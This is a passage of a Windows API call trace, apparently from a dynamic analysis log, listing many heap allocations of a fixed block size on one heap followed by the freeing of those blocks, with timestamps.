Flags=0x0, Size=0x13200) returned 0x29bb690 [0252.270] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x29ce8a0 [0252.271] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x29e1ab0 [0252.271] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x29f4cc0 [0252.271] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2a07ed0 [0252.272] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2a1b0e0 [0252.272] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2a2e2f0 [0252.273] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2a41500 [0252.273] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2a54710 [0252.274] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2a67920 [0252.274] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2a7ab30 [0252.274] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2a8dd40 [0252.275] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2aa0f50 [0252.275] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2ab4160 [0252.275] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2ac7370 [0252.276] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2ada580 [0252.276] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2aed790 [0252.277] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2b009a0 [0252.277] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2b13bb0 [0252.278] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2b26dc0 [0252.278] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2b39fd0 [0252.278] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2b4d1e0 [0252.279] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2b603f0 [0252.279] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2b73600 [0252.280] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2b86810 [0252.280] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2b99a20 [0252.280] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2bacc30 [0252.281] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2bbfe40 [0252.281] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2bd3050 [0252.282] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2be6260 [0252.282] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2bf9470 [0252.282] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2c0c680 [0252.283] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2c1f890 [0252.283] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2c32aa0 [0252.284] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2c45cb0 [0252.284] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2c58ec0 [0252.284] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2c6c0d0 [0252.285] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2c7f2e0 [0252.285] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2c924f0 [0252.286] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2ca5700 [0252.286] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2cb8910 [0252.287] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2ce0080 [0252.289] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2cf3290 [0252.289] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2d064a0 [0252.290] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2d196b0 [0252.290] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2d2c8c0 [0252.291] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2d3fad0 [0252.459] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x9e0) returned 0x42c5f0 [0252.459] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x418910 | out: hHeap=0x400000) returned 1 [0252.459] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2d52ce0 [0252.459] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2d65ef0 [0252.460] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2d79100 [0252.460] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2d8c310 [0252.461] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2d9f520 [0252.461] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2db2730 [0252.462] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2dc5940 [0252.462] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2dd8b50 [0252.462] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2debd60 [0252.463] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2dfef70 [0252.463] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2e12180 [0252.464] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2e25390 [0252.464] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2e385a0 [0252.465] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2e4b7b0 [0252.465] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x13200) returned 0x2e5e9c0 [0252.494] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x42c5f0 | out: hHeap=0x400000) returned 1 [0258.466] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x437480 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x457280 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x46a490 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x47d6a0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4908b0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4a3ac0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4b6cd0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4c9ee0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4dd0f0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1de0080 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1df3290 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1e064a0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1e196b0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1e2c8c0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1e3fad0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1e52ce0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1e65ef0 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1e79100 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1e8c310 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1e9f520 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1eb2730 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1ee0080 | out: hHeap=0x400000) returned 1 [0258.467] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1ef3290 | out: hHeap=0x400000) returned 1 [0258.468] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1f064a0 | out: hHeap=0x400000) returned 1 [0258.468] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1f196b0 | out: hHeap=0x400000) returned 1 [0258.468] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1f2c8c0 | out: hHeap=0x400000) returned 1 [0258.588] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1f3fad0 | out: hHeap=0x400000) returned 1 [0258.589] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1f52ce0 | out: hHeap=0x400000) returned 1 [0258.589] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1f65ef0 | out: hHeap=0x400000) returned 1 [0258.589] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1f79100 | out: hHeap=0x400000) returned 1 [0258.589] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1f8c310 | out: hHeap=0x400000) returned 1 [0258.589] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1f9f520 | out: hHeap=0x400000) returned 1 [0258.589] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1fb2730 | out: hHeap=0x400000) returned 1 [0258.589] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1fc5940 | out: hHeap=0x400000) returned 1 [0258.589] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1fd8b50 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1febd60 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x1ffef70 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2012180 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2025390 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x20385a0 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x204b7b0 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x205e9c0 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2071bd0 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2084de0 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2097ff0 | out: hHeap=0x400000) returned 1 [0258.595] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x20ab200 | out: hHeap=0x400000) returned 1 [0258.596] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x20be410 | out: hHeap=0x400000) returned 1 [0258.596] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x20e0080 | out: hHeap=0x400000) returned 1 [0258.596] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x20f3290 | out: hHeap=0x400000) returned 1 [0258.602] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x21064a0 | out: hHeap=0x400000) returned 1 [0258.602] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x21196b0 | out: hHeap=0x400000) returned 1 [0258.602] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x212c8c0 | out: hHeap=0x400000) returned 1 [0258.603] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x213fad0 | out: hHeap=0x400000) returned 1 [0258.603] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2152ce0 | out: hHeap=0x400000) returned 1 [0258.603] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2165ef0 | out: hHeap=0x400000) returned 1 [0258.603] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2179100 | out: hHeap=0x400000) returned 1 [0258.603] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x218c310 | out: hHeap=0x400000) returned 1 [0258.603] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x219f520 | out: hHeap=0x400000) returned 1 [0258.603] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x21b2730 | out: hHeap=0x400000) returned 1 [0258.603] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x21c5940 | out: hHeap=0x400000) returned 1 [0258.603] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x21d8b50 | out: hHeap=0x400000) returned 1 [0258.608] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x21ebd60 | out: hHeap=0x400000) returned 1 [0258.608] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x21fef70 | out: hHeap=0x400000) returned 1 [0258.608] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2212180 | out: hHeap=0x400000) returned 1 [0258.608] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2225390 | out: hHeap=0x400000) returned 1 [0258.608] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x22385a0 | out: hHeap=0x400000) returned 1 [0258.608] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x224b7b0 | out: hHeap=0x400000) returned 1 [0258.609] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x225e9c0 | out: hHeap=0x400000) returned 1 [0258.609] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2271bd0 | out: hHeap=0x400000) returned 1 [0258.609] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2284de0 | out: hHeap=0x400000) returned 1 [0258.609] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2297ff0 | out: hHeap=0x400000) returned 1 [0258.612] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x22ab200 | out: hHeap=0x400000) returned 1 [0258.816] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x22be410 | out: hHeap=0x400000) returned 1 [0258.816] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x22d1620 | out: hHeap=0x400000) returned 1 [0258.816] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x22e4830 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x22f7a40 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x230ac50 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x231de60 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2331070 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2344280 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2357490 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x236a6a0 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x237d8b0 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2390ac0 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x23a3cd0 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x23b6ee0 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x23ca0f0 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x23dd300 | out: hHeap=0x400000) returned 1 [0258.821] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x23f0510 | out: hHeap=0x400000) returned 1 [0258.828] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2403720 | out: hHeap=0x400000) returned 1 [0258.828] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2416930 | out: hHeap=0x400000) returned 1 [0258.829] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2429b40 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x243cd50 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x244ff60 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2463170 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2476380 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2489590 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x249c7a0 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x24af9b0 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x24c2bc0 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x24e0080 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x24f3290 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x25064a0 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x25196b0 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x252c8c0 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x253fad0 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2552ce0 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2565ef0 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2579100 | out: hHeap=0x400000) returned 1 [0258.830] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x258c310 | out: hHeap=0x400000) returned 1 [0258.840] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x259f520 | out: hHeap=0x400000) returned 1 [0258.842] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x25b2730 | out: hHeap=0x400000) returned 1 [0258.842] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x25c5940 | out: hHeap=0x400000) returned 1 [0258.842] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x25d8b50 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x25ebd60 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x25fef70 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2612180 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2625390 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x26385a0 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x264b7b0 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x265e9c0 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2671bd0 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2684de0 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2697ff0 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x26ab200 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x26be410 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x26d1620 | out: hHeap=0x400000) returned 1 [0258.846] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x26e4830 | out: hHeap=0x400000) returned 1 [0258.852] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x26f7a40 | out: hHeap=0x400000) returned 1 [0258.853] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x270ac50 | out: hHeap=0x400000) returned 1 [0258.968] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x271de60 | out: hHeap=0x400000) returned 1 [0258.968] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2731070 | out: hHeap=0x400000) returned 1 [0258.968] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2744280 | out: hHeap=0x400000) returned 1 [0258.968] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2757490 | out: hHeap=0x400000) returned 1 [0258.968] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x276a6a0 | out: hHeap=0x400000) returned 1 [0258.968] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x277d8b0 | out: hHeap=0x400000) returned 1 [0258.969] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2790ac0 | out: hHeap=0x400000) returned 1 [0258.969] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x27a3cd0 | out: hHeap=0x400000) returned 1 [0258.969] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x27b6ee0 | out: hHeap=0x400000) returned 1 [0258.969] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x27ca0f0 | out: hHeap=0x400000) returned 1 [0258.969] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x27dd300 | out: hHeap=0x400000) returned 1 [0258.969] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x27f0510 | out: hHeap=0x400000) returned 1 [0258.975] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2803720 | out: hHeap=0x400000) returned 1 [0258.975] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2816930 | out: hHeap=0x400000) returned 1 [0258.975] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2829b40 | out: hHeap=0x400000) returned 1 [0258.975] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x283cd50 | out: hHeap=0x400000) returned 1 [0258.978] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x284ff60 | out: hHeap=0x400000) returned 1 [0258.979] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2863170 | out: hHeap=0x400000) returned 1 [0258.979] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2876380 | out: hHeap=0x400000) returned 1 [0258.979] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2889590 | out: hHeap=0x400000) returned 1 [0258.979] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x289c7a0 | out: hHeap=0x400000) returned 1 [0258.979] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x28af9b0 | out: hHeap=0x400000) returned 1 [0258.979] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x28c2bc0 | out: hHeap=0x400000) returned 1 [0258.979] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x28d5dd0 | out: hHeap=0x400000) returned 1 [0258.980] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x28e8fe0 | out: hHeap=0x400000) returned 1 [0258.980] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x28fc1f0 | out: hHeap=0x400000) returned 1 [0258.985] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x290f400 | out: hHeap=0x400000) returned 1 [0258.985] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2922610 | out: hHeap=0x400000) returned 1 [0258.985] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2935820 | out: hHeap=0x400000) returned 1 [0258.985] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2948a30 | out: hHeap=0x400000) returned 1 [0258.986] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x295bc40 | out: hHeap=0x400000) returned 1 [0258.988] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x296ee50 | out: hHeap=0x400000) returned 1 [0258.989] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2982060 | out: hHeap=0x400000) returned 1 [0258.989] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2995270 | out: hHeap=0x400000) returned 1 [0258.989] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x29a8480 | out: hHeap=0x400000) returned 1 [0258.989] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x29bb690 | out: hHeap=0x400000) returned 1 [0258.989] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x29ce8a0 | out: hHeap=0x400000) returned 1 [0258.989] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x29e1ab0 | out: hHeap=0x400000) returned 1 [0258.989] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x29f4cc0 | out: hHeap=0x400000) returned 1 [0258.989] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2a07ed0 | out: hHeap=0x400000) returned 1 [0258.995] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2a1b0e0 | out: hHeap=0x400000) returned 1 [0258.995] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2a2e2f0 | out: hHeap=0x400000) returned 1 [0258.995] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2a41500 | out: hHeap=0x400000) returned 1 [0258.995] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2a54710 | out: hHeap=0x400000) returned 1 [0258.995] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2a67920 | out: hHeap=0x400000) returned 1 [0258.995] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2a7ab30 | out: hHeap=0x400000) returned 1 [0259.000] HeapFree (in: 